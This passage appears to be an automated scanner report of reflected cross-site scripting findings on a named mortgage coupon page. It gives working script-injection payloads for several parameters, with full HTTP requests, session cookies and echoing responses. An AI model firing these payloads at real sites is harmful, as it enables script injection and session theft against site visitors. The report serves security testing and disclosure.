<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=69682947d57"><script>alert(1)</script>3b3d1a7631b&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfc43'><script>alert(1)</script>24de61d88b7 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829cfc43'><script>alert(1)</script>24de61d88b7&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:37 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:29 GMT;path=/;httponly Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2239'><script>alert(1)</script>f71a112c65e was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1c2239'><script>alert(1)</script>f71a112c65e&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:56 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:47 GMT;path=/;httponly Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367c8"><script>alert(1)</script>5ab130b97d9 was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1367c8"><script>alert(1)</script>5ab130b97d9&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:55 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:47 GMT;path=/;httponly Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1367c8"><script>alert(1)</script>5ab130b97d9&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
1.142. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gsbmtg.rtrk.com
Path:
/coupon/d544/544003/index4.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d8aff'><script>alert(1)</script>47f8bcfe9d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?d8aff'><script>alert(1)</script>47f8bcfe9d3=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:36 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:28 GMT;path=/;httponly Content-Length: 6199
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
1.143. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gsbmtg.rtrk.com
Path:
/coupon/d544/544003/index4.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96167"><script>alert(1)</script>32c7c592d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?96167"><script>alert(1)</script>32c7c592d7e=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:35 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:27 GMT;path=/;httponly Content-Length: 6199
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?96167"><script>alert(1)</script>32c7c592d7e=1&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76da2"><script>alert(1)</script>5dae8506858 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com76da2"><script>alert(1)</script>5dae8506858&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:02 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:53 GMT;path=/;httponly Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com76da2"><script>alert(1)</script>5dae8506858&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6389e'><script>alert(1)</script>e62412c1fab was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com6389e'><script>alert(1)</script>e62412c1fab&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:03 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:54 GMT;path=/;httponly Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 14188'><script>alert(1)</script>e40d41c94b6 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb014188'><script>alert(1)</script>e40d41c94b6&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:50 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:42 GMT;path=/;httponly Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a30c4"><script>alert(1)</script>c7a08c9e329 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0a30c4"><script>alert(1)</script>c7a08c9e329&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:49 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:41 GMT;path=/;httponly Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0a30c4"><script>alert(1)</script>c7a08c9e329&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 365b2"><script>alert(1)</script>3bd7c0702c5 was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1365b2"><script>alert(1)</script>3bd7c0702c5 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:07 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:59 GMT;path=/;httponly Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... ntactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1365b2"><script>alert(1)</script>3bd7c0702c5');" id="send_btn"> ...[SNIP]...
The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31691'><script>alert(1)</script>19c3a704535 was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=131691'><script>alert(1)</script>19c3a704535 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:08 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:45:00 GMT;path=/;httponly Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d36d"><script>alert(1)</script>507bab1fa3b was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=17949714d36d"><script>alert(1)</script>507bab1fa3b&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:24 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:16 GMT;path=/;httponly Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=17949714d36d"><script>alert(1)</script>507bab1fa3b&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64696'><script>alert(1)</script>dca245ab55 was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=179497164696'><script>alert(1)</script>dca245ab55&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:25 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:16 GMT;path=/;httponly Content-Length: 6459
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3a414'><script>alert(1)</script>e5878460b3e was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=110203080025953193a414'><script>alert(1)</script>e5878460b3e&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:44 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7c45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:36 GMT;path=/;httponly Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba9e7"><script>alert(1)</script>71945edcd2 was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319ba9e7"><script>alert(1)</script>71945edcd2&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:44 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7c45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:35 GMT;path=/;httponly Content-Length: 6459
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319ba9e7"><script>alert(1)</script>71945edcd2&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee1d"><script>alert(1)</script>f134721e21d was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=6968294ee1d"><script>alert(1)</script>f134721e21d&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:11:33 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:25 GMT;path=/;httponly Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb3a"><script>alert(1)</script>297f12ffdf6 was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
